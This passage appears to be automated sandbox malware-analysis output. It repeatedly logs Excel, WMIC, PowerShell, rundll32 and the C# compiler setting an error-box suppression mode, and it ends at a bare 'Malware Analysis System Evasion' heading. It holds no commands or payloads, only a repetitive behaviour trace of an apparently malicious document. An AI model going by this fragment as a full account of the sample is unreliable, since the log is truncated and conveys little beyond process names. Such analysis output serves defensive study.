Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex